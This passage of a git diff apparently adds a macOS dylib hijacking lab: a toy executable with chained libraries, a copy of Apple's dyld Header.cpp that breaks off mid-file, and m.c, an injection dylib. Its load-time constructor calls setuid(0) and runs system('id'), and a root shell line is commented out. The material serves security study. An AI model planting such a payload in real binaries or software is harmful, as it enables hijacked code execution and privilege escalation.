diff --git a/IV. Dylibs/custom/lib1.c b/IV. Dylibs/custom/lib1.c
new file mode 100644
index 0000000..7ac07fc
--- /dev/null
+++ b/IV. Dylibs/custom/lib1.c
@@ -0,0 +1,11 @@
+//clang -dynamiclib lib1.c -o $PWD/lib1.dylib -L. -l2
+#include <stdio.h>
+#include "lib1.h"
+#include "lib2.h"
+
+void callLib1Function() {
+    printf("Now, wer are in lib1.dylib code.\n");
+    printf("Press enter to enter lib2.dylib function\n");
+    getchar();
+    callLib2Function();
+}
diff --git a/IV. Dylibs/custom/lib1.h b/IV. Dylibs/custom/lib1.h
new file mode 100644
index 0000000..3b0c4e4
--- /dev/null
+++ b/IV. Dylibs/custom/lib1.h
@@ -0,0 +1,7 @@
+#ifndef LIB1_H
+#define LIB1_H
+
+void callLib1Function();
+
+#endif
+
diff --git a/IV. Dylibs/custom/lib2.c b/IV. Dylibs/custom/lib2.c
new file mode 100644
index 0000000..f6c789e
--- /dev/null
+++ b/IV. Dylibs/custom/lib2.c
@@ -0,0 +1,10 @@
+//clang -dynamiclib lib2.c -o $PWD/lib2.dylib
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+
+void callLib2Function() {
+    printf("Now we are in lib2.dylib.\n");
+    printf("Press enter to back to executable code...\n");
+    getchar();
+}
diff --git a/IV. Dylibs/custom/lib2.h b/IV. Dylibs/custom/lib2.h
new file mode 100644
index 0000000..b9a6765
--- /dev/null
+++ b/IV. Dylibs/custom/lib2.h
@@ -0,0 +1,7 @@
+#ifndef LIB2_H
+#define LIB2_H
+
+void callLib2Function();
+
+#endif
+
diff --git a/IV. Dylibs/custom/m.c b/IV. Dylibs/custom/m.c
new file mode 100644
index 0000000..8c5e61c
--- /dev/null
+++ b/IV. Dylibs/custom/m.c
@@ -0,0 +1,17 @@
+// clang -dynamiclib m.c -o m.dylib //-o $PWD/TARGET_DYLIB
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <syslog.h>
+
+__attribute__((constructor))
+void myconstructor(int argc, const char **argv)
+{
+    syslog(LOG_ERR, "[+] m.dylib injected in %s\n", argv[0]);
+    printf("[+] m.dylib injected in %s\n", argv[0]);
+    setuid(0);
+    system("id");
+    //system("/bin/sh");
+}
+
+void callLib1Function(void){}
\ No newline at end of file
diff --git a/IV. Dylibs/custom/main.c b/IV. Dylibs/custom/main.c
new file mode 100644
index 0000000..58c4fc7
--- /dev/null
+++ b/IV. Dylibs/custom/main.c
@@ -0,0 +1,15 @@
+//clang main.c -o $PWD/executable -L. -l1
+//codesign -s IDENTITY --option=runtime -f executable
+#include <stdio.h>
+#include "lib1.h"
+
+int main() {
+    printf("Main program\n");
+    printf("Press enter to call lib1.dylib function...\n");
+    getchar();
+    callLib1Function();
+    printf("Press Enter to exit...\n");
+    getchar();
+    return 0;
+}
+
diff --git a/IV. Dylibs/custom/mylib.c b/IV. Dylibs/custom/mylib.c
new file mode 100644
index 0000000..1754147
--- /dev/null
+++ b/IV. Dylibs/custom/mylib.c
@@ -0,0 +1,6 @@
+#include "mylib.h"
+#include <stdio.h>
+
+void myFunction() {
+    printf("Hello from mylib!\n");
+}
\ No newline at end of file
diff --git a/IV. Dylibs/custom/mylib.h b/IV. Dylibs/custom/mylib.h
new file mode 100644
index 0000000..533de96
--- /dev/null
+++ b/IV. Dylibs/custom/mylib.h
@@ -0,0 +1 @@
+void myFunction(); // Declare the function prototype
\ No newline at end of file
diff --git a/IV. Dylibs/custom/use_mylib.c b/IV. Dylibs/custom/use_mylib.c
new file mode 100644
index 0000000..3ee6ad6
--- /dev/null
+++ b/IV. Dylibs/custom/use_mylib.c
@@ -0,0 +1,6 @@
+#include "mylib.h"
+
+int main() {
+    myFunction(); // Call the function from the library
+    return 0;
+}
\ No newline at end of file
diff --git a/IV. Dylibs/macos/Header.cpp b/IV. Dylibs/macos/Header.cpp
new file mode 100644
index 0000000..59e8903
--- /dev/null
+++ b/IV. Dylibs/macos/Header.cpp
@@ -0,0 +1,2537 @@
+// Source: https://github.com/apple-oss-distributions/dyld/blob/rel/dyld-1122/mach_o/Header.cpp
+/*
+ * Copyright (c) 2021 Apple Inc. All rights reserved.
+ * @APPLE_LICENSE_HEADER_START@
+ *
+ * This file contains Original Code and/or Modifications of Original Code
+ * as defined in and that are subject to the Apple Public Source License
+ * Version 2.0 (the 'License'). You may not use this file except in
+ * compliance with the License.
Please obtain a copy of the License at + * http://www.opensource.apple.com/apsl/ and read it before using this + * file. + * + * The Original Code and all software distributed under the License are + * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER + * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, + * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. + * Please see the License for the specific language governing rights and + * limitations under the License. + * + * @APPLE_LICENSE_HEADER_END@ + */ + +#include + +#include +#include +#include +#include + +#include +#if !TARGET_OS_EXCLAVEKIT + #include +#endif + +#include "Array.h" +#include "Header.h" +#include "Architecture.h" +#include "Misc.h" +#include "Policy.h" +#include "LoggingStub.h" + +using mach_o::Architecture; +using mach_o::Platform; +using mach_o::PlatformAndVersions; +using mach_o::Policy; + +namespace mach_o { + +// +// MARK: --- methods that read mach_header --- +// + +bool Header::hasMachOMagic() const +{ + return ((mh.magic == MH_MAGIC) || (mh.magic == MH_MAGIC_64)); +} + +bool Header::hasMachOBigEndianMagic() const +{ + return ((mh.magic == MH_CIGAM) || (mh.magic == MH_CIGAM_64)); +} + +bool Header::is64() const +{ + return (mh.magic == MH_MAGIC_64); +} + +uint32_t Header::machHeaderSize() const +{ + return is64() ? 
sizeof(mach_header_64) : sizeof(mach_header); +} + +uint32_t Header::pointerSize() const +{ + if ( mh.magic == MH_MAGIC_64 ) + return 8; + else + return 4; +} + +bool Header::uses16KPages() const +{ + switch ( mh.cputype ) { + case CPU_TYPE_ARM64: + case CPU_TYPE_ARM64_32: + return true; + case CPU_TYPE_ARM: + // iOS is 16k aligned for armv7/armv7s and watchOS armv7k is 16k aligned + return mh.cpusubtype == CPU_SUBTYPE_ARM_V7K; + default: + return false; + } +} + +bool Header::isArch(const char* aName) const +{ + return (strcmp(aName, this->archName()) == 0); +} + +const char* Header::archName() const +{ + return Architecture(&mh).name(); +} + +Architecture Header::arch() const +{ + return Architecture(&mh); +} + +bool Header::inDyldCache() const +{ + return (mh.flags & MH_DYLIB_IN_CACHE); +} + +bool Header::isDyldManaged() const +{ + switch ( mh.filetype ) { + case MH_BUNDLE: + case MH_EXECUTE: + case MH_DYLIB: + return ((mh.flags & MH_DYLDLINK) != 0); + default: + break; + } + return false; +} + +bool Header::isDylib() const +{ + return (mh.filetype == MH_DYLIB); +} + +bool Header::isBundle() const +{ + return (mh.filetype == MH_BUNDLE); +} + +bool Header::isMainExecutable() const +{ + return (mh.filetype == MH_EXECUTE); +} + +bool Header::isDynamicExecutable() const +{ + if ( mh.filetype != MH_EXECUTE ) + return false; + + // static executables do not have dyld load command + return hasLoadCommand(LC_LOAD_DYLINKER); +} + +bool Header::isKextBundle() const +{ + return (mh.filetype == MH_KEXT_BUNDLE); +} + +bool Header::isObjectFile() const +{ + return (mh.filetype == MH_OBJECT); +} + +bool Header::isFileSet() const +{ + return (mh.filetype == MH_FILESET); +} + +bool Header::isPIE() const +{ + return (mh.flags & MH_PIE); +} + +bool Header::isPreload() const +{ + return (mh.filetype == MH_PRELOAD); +} + +bool Header::hasWeakDefs() const +{ + return (mh.flags & MH_WEAK_DEFINES); +} + +bool Header::usesWeakDefs() const +{ + return (mh.flags & MH_BINDS_TO_WEAK); +} + 
+bool Header::hasThreadLocalVariables() const +{ + return (mh.flags & MH_HAS_TLV_DESCRIPTORS); +} + +const Header* Header::isMachO(std::span content) +{ + if ( content.size() < sizeof(mach_header) ) + return nullptr; + + const Header* mh = (const Header*)content.data(); + if ( mh->hasMachOMagic() ) + return mh; + return nullptr; +} + +bool Header::mayHaveTextFixups() const +{ + // only i386 binaries support text fixups + if ( mh.cputype == CPU_TYPE_I386 ) + return true; + // and x86_64 kext bundles + if ( isKextBundle() && (mh.cputype == CPU_TYPE_X86_64) ) + return true; + return false; +} + +bool Header::hasSubsectionsViaSymbols() const +{ + return (this->mh.flags & MH_SUBSECTIONS_VIA_SYMBOLS) != 0; +} + +bool Header::noReexportedDylibs() const +{ + return (this->mh.flags & MH_NO_REEXPORTED_DYLIBS) != 0; +} + +bool Header::isAppExtensionSafe() const +{ + return (this->mh.flags & MH_APP_EXTENSION_SAFE) != 0; +} + +bool Header::isSimSupport() const +{ + return (this->mh.flags & MH_SIM_SUPPORT) != 0; +} + + +// +// MARK: --- methods for validating mach-o content --- +// + +PlatformAndVersions Header::platformAndVersions() const +{ + // should be one platform load command (exception is zippered dylibs) + __block PlatformAndVersions pvs; + forEachPlatformLoadCommand(^(Platform platform, Version32 minOS, Version32 sdk) { + Error err = pvs.zip({ platform, minOS, sdk }); + assert(err.noError()); + }); + return pvs; +} + +Error Header::validSemanticsPlatform() const +{ + // should be one platform load command (exception is zippered dylibs) + __block PlatformAndVersions pvs; + __block Error badPlatform; + forEachPlatformLoadCommand(^(Platform platform, Version32 minOS, Version32 sdk) { + if ( badPlatform.hasError() ) return; + + if ( Error err = platform.valid() ) { + badPlatform = std::move(err); + return; + } + badPlatform = pvs.zip({ platform, minOS, sdk }); + }); + if ( badPlatform ) + return std::move(badPlatform); + +#if BUILDING_MACHO_WRITER + if ( 
pvs.platform.empty() ) + return Error::none(); // allow empty platform in static linker +#endif + + return pvs.platform.valid(); +} + +Error Header::valid(uint64_t fileSize) const +{ + if ( fileSize < sizeof(mach_header) ) + return Error("file is too short"); + + if ( !hasMachOMagic() ) + return Error("not a mach-o file (start is no MH_MAGIC[_64])"); + + if ( Error err = validStructureLoadCommands(fileSize) ) + return err; + + if ( Error err = validSemanticsPlatform() ) + return err; + + // create policy object + Policy policy(arch(), platformAndVersions(), mh.filetype, false); + + if ( Error err = validSemanticsUUID(policy) ) + return err; + + if ( Error err = validSemanticsInstallName(policy) ) + return err; + + if ( Error err = validSemanticsDependents(policy) ) + return err; + + if ( Error err = validSemanticsRPath(policy) ) + return err; + + if ( Error err = validSemanticsSegments(policy, fileSize) ) + return err; + + if ( Error err = validSemanticsLinkerOptions(policy) ) + return err; + + if ( isMainExecutable() ) { + if ( Error err = validSemanticsMain(policy) ) + return err; + } + + return Error::none(); +} + +static Error stringOverflow(const load_command* cmd, uint32_t index, uint32_t strOffset) +{ + if ( strOffset >= cmd->cmdsize ) + return Error("load command #%d string offset (%u) outside its size (%u)", index, strOffset, cmd->cmdsize); + + const char* str = (char*)cmd + strOffset; + const char* end = (char*)cmd + cmd->cmdsize; + for ( const char* s = str; s < end; ++s ) { + if ( *s == '\0' ) { + return Error::none(); + } + } + return Error("load command #%d string extends beyond end of load command", index); +} + +Error Header::validStructureLoadCommands(uint64_t fileSize) const +{ + // check load command don't exceed file length + const uint64_t headerAndLCSize = mh.sizeofcmds + machHeaderSize(); + if ( headerAndLCSize > fileSize ) { + return Error("load commands length (%llu) exceeds length of file (%llu)", headerAndLCSize, fileSize); + } + + // 
check for reconized filetype + switch ( mh.filetype ) { + case MH_EXECUTE: + case MH_DYLIB: + case MH_DYLINKER: + case MH_BUNDLE: + case MH_KEXT_BUNDLE: + case MH_FILESET: + case MH_PRELOAD: + case MH_OBJECT: + break; + default: + return Error("unknown filetype %d", mh.filetype); + } + + // walk all load commands and sanity check them + __block int index = 1; + __block Error lcError; + auto lcChecker = ^(const load_command* cmd, bool& stop) { + const dylib_command* dylibCmd; + const rpath_command* rpathCmd; + const sub_umbrella_command* umbrellaCmd; + const sub_client_command* clientCmd; + const sub_library_command* libraryCmd; + const build_version_command* buildVersCmd; + const segment_command* segCmd; + const segment_command_64* seg64Cmd; + const fileset_entry_command* fileSetCmd; + switch ( cmd->cmd ) { + case LC_ID_DYLIB: + case LC_LOAD_DYLIB: + case LC_LOAD_WEAK_DYLIB: + case LC_REEXPORT_DYLIB: + case LC_LOAD_UPWARD_DYLIB: + dylibCmd = (dylib_command*)cmd; + lcError = stringOverflow(cmd, index, dylibCmd->dylib.name.offset); + break; + case LC_RPATH: + rpathCmd = (rpath_command*)cmd; + lcError = stringOverflow(cmd, index, rpathCmd->path.offset); + break; + case LC_SUB_UMBRELLA: + umbrellaCmd = (sub_umbrella_command*)cmd; + lcError = stringOverflow(cmd, index, umbrellaCmd->sub_umbrella.offset); + break; + case LC_SUB_CLIENT: + clientCmd = (sub_client_command*)cmd; + lcError = stringOverflow(cmd, index, clientCmd->client.offset); + break; + case LC_SUB_LIBRARY: + libraryCmd = (sub_library_command*)cmd; + lcError = stringOverflow(cmd, index, libraryCmd->sub_library.offset); + break; + case LC_SYMTAB: + if ( cmd->cmdsize != sizeof(symtab_command) ) + lcError = Error("load command #%d LC_SYMTAB size wrong", index); + break; + case LC_DYSYMTAB: + if ( cmd->cmdsize != sizeof(dysymtab_command) ) + lcError = Error("load command #%d LC_DYSYMTAB size wrong", index); + break; + case LC_SEGMENT_SPLIT_INFO: + if ( cmd->cmdsize != sizeof(linkedit_data_command) ) + lcError = 
Error("load command #%d LC_SEGMENT_SPLIT_INFO size wrong", index); + break; + case LC_ATOM_INFO: + if ( cmd->cmdsize != sizeof(linkedit_data_command) ) + lcError = Error("load command #%d LC_ATOM_INFO size wrong", index); + break; + case LC_FUNCTION_STARTS: + if ( cmd->cmdsize != sizeof(linkedit_data_command) ) + lcError = Error("load command #%d LC_FUNCTION_STARTS size wrong", index); + break; + case LC_DYLD_EXPORTS_TRIE: + if ( cmd->cmdsize != sizeof(linkedit_data_command) ) + lcError = Error("load command #%d LC_DYLD_EXPORTS_TRIE size wrong", index); + break; + case LC_DYLD_CHAINED_FIXUPS: + if ( cmd->cmdsize != sizeof(linkedit_data_command) ) + lcError = Error("load command #%d LC_DYLD_CHAINED_FIXUPS size wrong", index); + break; + case LC_ENCRYPTION_INFO: + if ( cmd->cmdsize != sizeof(encryption_info_command) ) + lcError = Error("load command #%d LC_ENCRYPTION_INFO size wrong", index); + break; + case LC_ENCRYPTION_INFO_64: + if ( cmd->cmdsize != sizeof(encryption_info_command_64) ) + lcError = Error("load command #%d LC_ENCRYPTION_INFO_64 size wrong", index); + break; + case LC_DYLD_INFO: + case LC_DYLD_INFO_ONLY: + if ( cmd->cmdsize != sizeof(dyld_info_command) ) + lcError = Error("load command #%d LC_DYLD_INFO_ONLY size wrong", index); + break; + case LC_VERSION_MIN_MACOSX: + case LC_VERSION_MIN_IPHONEOS: + case LC_VERSION_MIN_TVOS: + case LC_VERSION_MIN_WATCHOS: + if ( cmd->cmdsize != sizeof(version_min_command) ) + lcError = Error("load command #%d LC_VERSION_MIN_* size wrong", index); + break; + case LC_UUID: + if ( cmd->cmdsize != sizeof(uuid_command) ) + lcError = Error("load command #%d LC_UUID size wrong", index); + break; + case LC_BUILD_VERSION: + buildVersCmd = (build_version_command*)cmd; + if ( cmd->cmdsize != (sizeof(build_version_command) + buildVersCmd->ntools * sizeof(build_tool_version)) ) + lcError = Error("load command #%d LC_BUILD_VERSION size wrong", index); + break; + case LC_MAIN: + if ( cmd->cmdsize != sizeof(entry_point_command) ) + 
lcError = Error("load command #%d LC_MAIN size wrong", index); + break; + case LC_SEGMENT: + segCmd = (segment_command*)cmd; + if ( cmd->cmdsize != (sizeof(segment_command) + segCmd->nsects * sizeof(section)) ) + lcError = Error("load command #%d LC_SEGMENT size does not match number of sections", index); + break; + case LC_SEGMENT_64: + seg64Cmd = (segment_command_64*)cmd; + if ( cmd->cmdsize != (sizeof(segment_command_64) + seg64Cmd->nsects * sizeof(section_64)) ) + lcError = Error("load command #%d LC_SEGMENT_64 size does not match number of sections", index); + break; + case LC_FILESET_ENTRY: + fileSetCmd = (fileset_entry_command*)cmd; + lcError = stringOverflow(cmd, index, fileSetCmd->entry_id.offset); + break; + default: + if ( cmd->cmd & LC_REQ_DYLD ) + lcError = Error("load command #%d unknown required load command 0x%08X", index, cmd->cmd); + break; + } + ++index; + if ( lcError ) + stop = true; + }; + if ( Error err = this->forEachLoadCommand(lcChecker) ) + return err; + if ( lcError ) + return std::move(lcError); + /* + // check load commands fit in TEXT segment + if ( this->isDyldManaged() ) { + __block bool foundTEXT = false; + __block Error segError; + forEachSegment(^(const SegmentInfo& segInfo, bool& stop) { + if ( strcmp(segInfo.segName, "__TEXT") == 0 ) { + foundTEXT = true; + if ( headerAndLCSize > segInfo.fileSize ) { + segError = Error("load commands (%llu) exceed length of __TEXT segment (%llu)", headerAndLCSize, segInfo.fileSize); + } + if ( segInfo.fileOffset != 0 ) { + segError = Error("__TEXT segment not start of mach-o (%llu)", segInfo.fileOffset); + } + stop = true; + } + }); + if ( segError ) + return std::move(segError); + if ( !foundTEXT ) { + return Error("missing __TEXT segment"); + } + } +*/ + return Error::none(); +} + + +Error Header::validSemanticsUUID(const Policy& policy) const +{ + // should have at most one LC_UUID + __block unsigned uuidCount = 0; + forEachLoadCommandSafe(^(const load_command* cmd, bool& stop) { + if ( 
cmd->cmd == LC_UUID ) + ++uuidCount; + }); + if ( uuidCount > 1 ) + return Error("too many LC_UUID load commands"); + if ( (uuidCount == 0) && policy.enforceHasUUID() ) + return Error("missing LC_UUID load command"); + + return Error::none(); +} + +Error Header::validSemanticsInstallName(const Policy& policy) const +{ + __block const char* installName = nullptr; + __block int foundCount = 0; + forEachLoadCommandSafe(^(const load_command* cmd, bool& stop) { + if ( cmd->cmd == LC_ID_DYLIB ) { + const dylib_command* dylibCmd = (dylib_command*)cmd; + installName = (char*)dylibCmd + dylibCmd->dylib.name.offset; + ++foundCount; + } + }); + if ( foundCount > 1 ) + return Error("multiple LC_ID_DYLIB found"); + + if ( this->isDylib() ) { + if ( installName == nullptr ) + return Error("MH_DYLIB is missing LC_ID_DYLIB"); +#if 0 // FIXME: need path plumbed down + if ( policy.enforceInstallNamesAreRealPaths() ) { + // new binary, so check that part after @xpath/ is real (not symlinks) + if ( (strncmp(installName, "@loader_path/", 13) == 0) || (strncmp(installName, "@executable_path/", 17) == 0) ) { + if ( const char* s = strchr(installName, '/') ) { + while (strncmp(s, "/..", 3) == 0) + s += 3; + const char* trailingInstallPath = s; + const char* trailingRealPath = &path[strlen(path)-strlen(trailingInstallPath)]; + if ( strcmp(trailingRealPath, trailingInstallPath) != 0 ) { + Error("install name '%s' contains symlinks", installName); + } + } + } + } +#endif + } + else { + if ( installName != nullptr ) + return Error("found LC_ID_DYLIB found in non-MH_DYLIB"); + } + + return Error::none(); +} + +Error Header::validSemanticsDependents(const Policy& policy) const +{ + // gather info + __block Error dupDepError; + __block int depCount = 0; + const char* depPathsBuffer[256]; + const char** depPaths = depPathsBuffer; + const bool enforceNoDupDylibs = policy.enforceNoDuplicateDylibs(); + const bool hasWarningHandler = mach_o::hasWarningHandler(); + // don't use forEachDependentDylib, 
because it synthesizes libSystem.dylib + forEachLoadCommandSafe(^(const load_command* cmd, bool& stop) { + switch ( cmd->cmd ) { + case LC_LOAD_DYLIB: + case LC_LOAD_WEAK_DYLIB: + case LC_REEXPORT_DYLIB: + case LC_LOAD_UPWARD_DYLIB: { + const dylib_command* dylibCmd = (dylib_command*)cmd; + const char* loadPath = (char*)dylibCmd + dylibCmd->dylib.name.offset; + if ( (depCount < 256) && ( enforceNoDupDylibs || hasWarningHandler ) ) { + for ( int i = 0; i < depCount; ++i ) { + if ( strcmp(loadPath, depPaths[i]) == 0 ) { + if ( enforceNoDupDylibs ) { + dupDepError = Error("duplicate dependent dylib '%s'", loadPath); + stop = true; + } else + warning(this, "duplicate dependent dylib are deprecated ('%s')", loadPath); + } + } + depPaths[depCount] = loadPath; + } + ++depCount; + } break; + } + }); + if ( dupDepError ) + return std::move(dupDepError); + + // all new binaries must link with something + if ( this->isDyldManaged() && policy.enforceHasLinkedDylibs() && (depCount == 0) ) { + // except for dylibs in libSystem.dylib which are ok to link with nothing (they are on bottom) + const char* libSystemDir = this->builtForPlatform(Platform::driverKit, true) ? 
"/System/DriverKit/usr/lib/system/" : "/usr/lib/system/"; + const char* installName = this->installName(); + bool isNotLibSystem = (installName == nullptr) || (strncmp(installName, libSystemDir, strlen(libSystemDir)) != 0); + if ( isNotLibSystem ) + return Error("missing LC_LOAD_DYLIB (must link with at least libSystem.dylib)"); + } + return Error::none(); +} + +Error Header::validSemanticsRPath(const Policy& policy) const +{ + const bool enforceNoDupRPath = policy.enforceNoDuplicateRPaths(); + if ( !enforceNoDupRPath && !hasWarningHandler() ) + return Error::none(); + + __block Error dupRPathError; + __block int rpathCount = 0; + const char* rpathsBuffer[64]; + const char** rpaths = rpathsBuffer; + forEachRPath(^(const char* rPath, bool& stop) { + if ( rpathCount < 64 ) { + for ( int i = 0; i < rpathCount; ++i ) { + if ( strcmp(rPath, rpaths[i]) == 0 ) { + if ( enforceNoDupRPath ) { + dupRPathError = Error("duplicate LC_RPATH '%s'", rPath); + stop = true; + } else + warning(this, "duplicate LC_RPATH are deprecated ('%s')", rPath); + } + } + rpaths[rpathCount] = rPath; + } + ++rpathCount; + }); + return std::move(dupRPathError); +} + +#if !TARGET_OS_EXCLAVEKIT +template +Error Header::validSegment(const Policy& policy, uint64_t wholeFileSize, const SG* seg) const +{ + if ( greaterThanAddOrOverflow(seg->fileoff, seg->filesize, wholeFileSize) ) + return Error("segment '%s' load command content extends beyond end of file", seg->segname); + + // dyld should support non-allocatable __LLVM segment + if ( !isObjectFile() ) { + if ( (seg->filesize > seg->vmsize) && ((seg->vmsize != 0) || ((seg->flags & SG_NORELOC) == 0)) ) + return Error("segment '%s' filesize exceeds vmsize", seg->segname); + } + + // check permission bits + if ( (seg->initprot & 0xFFFFFFF8) != 0 ) { + return Error("%s segment permissions has invalid bits set (0x%08X)", seg->segname, seg->initprot); + } + if ( policy.enforceTextSegmentPermissions() ) { + if ( (strcmp(seg->segname, "__TEXT") == 0) && 
(seg->initprot != (VM_PROT_READ | VM_PROT_EXECUTE)) ) + return Error("__TEXT segment permissions is not 'r-x'"); + } + if ( policy.enforceReadOnlyLinkedit() ) { + if ( (strcmp(seg->segname, "__LINKEDIT") == 0) && (seg->initprot != VM_PROT_READ) ) + return Error("__LINKEDIT segment permissions is not 'r--'"); + } + if ( policy.enforceDataSegmentPermissions() ) { + if ( (strcmp(seg->segname, "__DATA") == 0) && (seg->initprot != (VM_PROT_READ | VM_PROT_WRITE)) ) + return Error("__DATA segment permissions is not 'rw-'"); + if ( strcmp(seg->segname, "__DATA_CONST") == 0 ) { + if ( seg->initprot != (VM_PROT_READ | VM_PROT_WRITE) ) + return Error("__DATA_CONST segment permissions is not 'rw-'"); + if ( (seg->flags & SG_READ_ONLY) == 0 ) { + if ( this->isDylib() && this->hasSplitSegInfo() ) { + // dylibs in dyld cache are allowed to not have SG_READ_ONLY set + } + else { + return Error("__DATA_CONST segment missing SG_READ_ONLY flag"); + } + } + } + } + + // check for vmaddr wrapping + if ( (seg->vmaddr + seg->vmsize) < seg->vmaddr ) + return Error("'%s' segment vm range wraps", seg->segname); + + // check sections are within its segment + const SC* const sectionsStart = (SC*)((char*)seg + sizeof(SG)); + const SC* const sectionsEnd = §ionsStart[seg->nsects]; + for ( const SC* sect = sectionsStart; (sect < sectionsEnd); ++sect ) { + if ( (int64_t)(sect->size) < 0 ) { + return Error("section '%s' size too large 0x%lX", sect->sectname, (size_t)sect->size); + } + else if ( sect->addr < seg->vmaddr ) { + return Error("section '%s' start address 0x%lX is before containing segment's address 0x%0lX", sect->sectname, (size_t)sect->addr, (size_t)seg->vmaddr); + } + else if ( policy.enforceSectionsInSegment() && (sect->addr + sect->size > seg->vmaddr + seg->vmsize) ) { + return Error("section '%s' end address 0x%lX is beyond containing segment's end address 0x%0lX", sect->sectname, (size_t)(sect->addr + sect->size), (size_t)(seg->vmaddr + seg->vmsize)); + } + } + + return 
Error::none(); +} + +#endif // !TARGET_OS_EXCLAVEKIT +struct Interval +{ + bool overlaps(const Interval& other) const; + uint64_t start; + uint64_t end; +}; + +bool Interval::overlaps(const Interval& other) const +{ + return ((other.start < this->end) && (other.end > this->start)); +} + +Error Header::validSemanticsSegments(const Policy& policy, uint64_t fileSize) const +{ + // check each segment load command in isolation + struct SegRange + { + Interval vm; + Interval file; + const char* name; + }; + STACK_ALLOC_OVERFLOW_SAFE_ARRAY(SegRange, ranges, 12); + __block Error lcError; + __block bool hasTEXT = false; + __block bool hasLINKEDIT = false; + __block uintptr_t segmentIndexText = 0; + __block uintptr_t segmentIndexLinkedit = 0; + forEachLoadCommandSafe(^(const load_command* cmd, bool& stop) { + if ( cmd->cmd == LC_SEGMENT_64 ) { + const segment_command_64* seg64 = (segment_command_64*)cmd; + if ( strcmp(seg64->segname, "__TEXT") == 0 ) { + hasTEXT = true; + segmentIndexText = ranges.count(); + } + else if ( strcmp(seg64->segname, "__LINKEDIT") == 0 ) { + hasLINKEDIT = true; + segmentIndexLinkedit = ranges.count(); + } + lcError = validSegment(policy, fileSize, seg64); + ranges.push_back({ { seg64->vmaddr, seg64->vmaddr + seg64->vmsize }, { seg64->fileoff, seg64->fileoff + seg64->filesize }, seg64->segname }); + } + else if ( cmd->cmd == LC_SEGMENT ) { + const segment_command* seg32 = (segment_command*)cmd; + if ( strcmp(seg32->segname, "__TEXT") == 0 ) { + hasTEXT = true; + segmentIndexText = ranges.count(); + } + else if ( strcmp(seg32->segname, "__LINKEDIT") == 0 ) { + hasLINKEDIT = true; + segmentIndexLinkedit = ranges.count(); + } + lcError = validSegment(policy, fileSize, seg32); + ranges.push_back({ { seg32->vmaddr, seg32->vmaddr + seg32->vmsize }, { seg32->fileoff, seg32->fileoff + seg32->filesize }, seg32->segname }); + } + if ( lcError ) + stop = true; + }); + if ( lcError ) + return std::move(lcError); + + // dynamic binaries have further 
restrictions + if ( isDyldManaged() ) { + if ( hasTEXT ) { + if ( ranges[segmentIndexText].file.start != 0 ) + return Error("__TEXT segment fileoffset is not zero"); + const uint32_t headerAndLCSize = machHeaderSize() + mh.sizeofcmds; + if ( ranges[segmentIndexText].file.end < headerAndLCSize ) + return Error("load commands do not fit in __TEXT segment"); + } + else { + return Error("missing __TEXT segment"); + } + // FIXME: LINKEDIT checks need to move to Analyzer + //if ( !hasLINKEDIT ) + // return Error("missing __LINKEDIT segment"); + } + + // check for overlapping segments, by looking at every possible pair of segments + for ( const SegRange& r1 : ranges ) { + for ( const SegRange& r2 : ranges ) { + if ( &r1 == &r2 ) + continue; + if ( r1.vm.overlaps(r2.vm) ) + return Error("vm range of segment '%s' overlaps segment '%s'", r1.name, r2.name); + if ( r1.file.overlaps(r2.file) ) + return Error("file range of segment '%s' overlaps segment '%s'", r1.name, r2.name); + } + } + + // check segment load command order matches file content order which matches vm order + // skip dyld cache because segments are moved around too much + if ( policy.enforceSegmentOrderMatchesLoadCmds() && !inDyldCache() ) { + const SegRange* last = nullptr; + for ( const SegRange& r : ranges ) { + if ( last != nullptr ) { + if ( (r.file.start < last->file.start) && (r.file.start != r.file.end) ) + return Error("segment '%s' file offset out of order", r.name); + if ( r.vm.start < last->vm.start ) { + if ( isFileSet() && (strcmp(r.name, "__PRELINK_INFO") == 0) ) { + // __PRELINK_INFO may have no vmaddr set + } + else { + return Error("segment '%s' vm address out of order", r.name); + } + } + } + last = &r; + } + } + + return Error::none(); +} + +Error Header::validSemanticsMain(const Policy& policy) const +{ + if ( this->inDyldCache() && policy.enforceMainFlagsCorrect() ) + return Error("MH_EXECUTE has MH_DYLIB_IN_CACHE bit set"); + + // validate the correct number of LC_MAIN or LC_UNIXTHREAD + 
__block Error lcError; + __block uint64_t startAddress = 0; + __block const entry_point_command* mainCmd = nullptr; + __block const thread_command* threadCmd = nullptr; + forEachLoadCommandSafe(^(const load_command* cmd, bool& stop) { + switch ( cmd->cmd ) { + case LC_MAIN: + if ( mainCmd != nullptr ) + lcError = Error("multiple LC_MAIN load commands"); + mainCmd = (entry_point_command*)cmd; + break; + case LC_UNIXTHREAD: + if ( threadCmd != nullptr ) + lcError = Error("multiple LC_UNIXTHREAD load commands"); + threadCmd = (thread_command*)cmd; + if ( !entryAddrFromThreadCmd(threadCmd, startAddress) ) + lcError = Error("invalid LC_UNIXTHREAD"); + break; + } + }); + if ( lcError ) + return std::move(lcError); + if ( (mainCmd != nullptr) && (threadCmd != nullptr) ) + return Error("can't have LC_MAIN and LC_UNIXTHREAD load commands"); + if ( this->builtForPlatform(Platform::driverKit) ) { + if ( (mainCmd != nullptr) || (threadCmd != nullptr) ) + return Error("LC_MAIN not allowed for driverkit"); + } + else { + if ( (mainCmd == nullptr) && (threadCmd == nullptr) ) + return Error("missing LC_MAIN or LC_UNIXTHREAD in main executable"); + } + + // FIXME: validate LC_MAIN or LC_UNIXTHREAD points into executable segment + return Error::none(); +} + +Error Header::validSemanticsLinkerOptions(const Policy& policy) const +{ + __block Error lcError; + + forEachLoadCommandSafe(^(const load_command *cmd, bool &stop) { + if ( cmd->cmd == LC_LINKER_OPTION ) { + const char* begin = (char*)cmd + sizeof(linker_option_command); + const char* end = (char*)cmd + cmd->cmdsize; + const uint32_t count = ((linker_option_command*)cmd)->count; + for ( uint32_t i = 0; i < count; ++i ) { + const char* next = begin + strlen(begin) + 1; + if ( next > end ) { + lcError = Error("malformed LC_LINKER_OPTION command"); + stop = true; + return; + } + begin = next; + } + } + }); + + return std::move(lcError); +} + +Error Header::forEachLoadCommand(void (^callback)(const load_command* cmd, bool& stop)) 
